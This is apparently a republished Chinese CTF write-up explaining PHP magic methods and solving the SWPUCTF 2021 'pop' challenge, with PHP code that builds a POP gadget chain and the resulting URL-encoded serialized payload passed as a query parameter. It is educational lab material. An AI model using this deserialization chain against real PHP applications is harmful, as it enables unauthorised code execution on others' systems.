PHP -pop魔術方法
阿新 • • 發佈:2022-05-17
PHP魔術方法:
PHP提供了一系列的魔術方法,這些魔術方法為程式設計提供了很多便利,在 PHP 中的作用是非常重要的。PHP 中的魔術方法通常以__(兩個下劃線)開始,可以在要使用時靈活呼叫。
例題
[SWPUCTF 2021 新生賽]pop
看這個PHP程式碼,發現中間呼叫了很多PHP魔術方法:
__destruct()(類物件使用結束時自動呼叫);這個方法可以直接呼叫。
__toString()(把物件轉換成字串時自動呼叫);
開始構造
<?php error_reporting(0); show_source("serialize.php"); class w44m{ private $admin = 'w44m'; protected $passwd = '08067'; } class w22m{ public $w00m; public function __destruct(){ echo $this->w00m; } } class w33m{ public $w00m; public $w22m='Getflag'; public function __toString(){ $this->w00m->{$this->w22m}(); return 0; } } $a = new w22m(); $b = new w33m(); $c = new w44m(); $b->w00m = $c; $a->w00m = $b; echo urlencode(serialize($a)); ?>
得到
O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
構造payload;
/?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D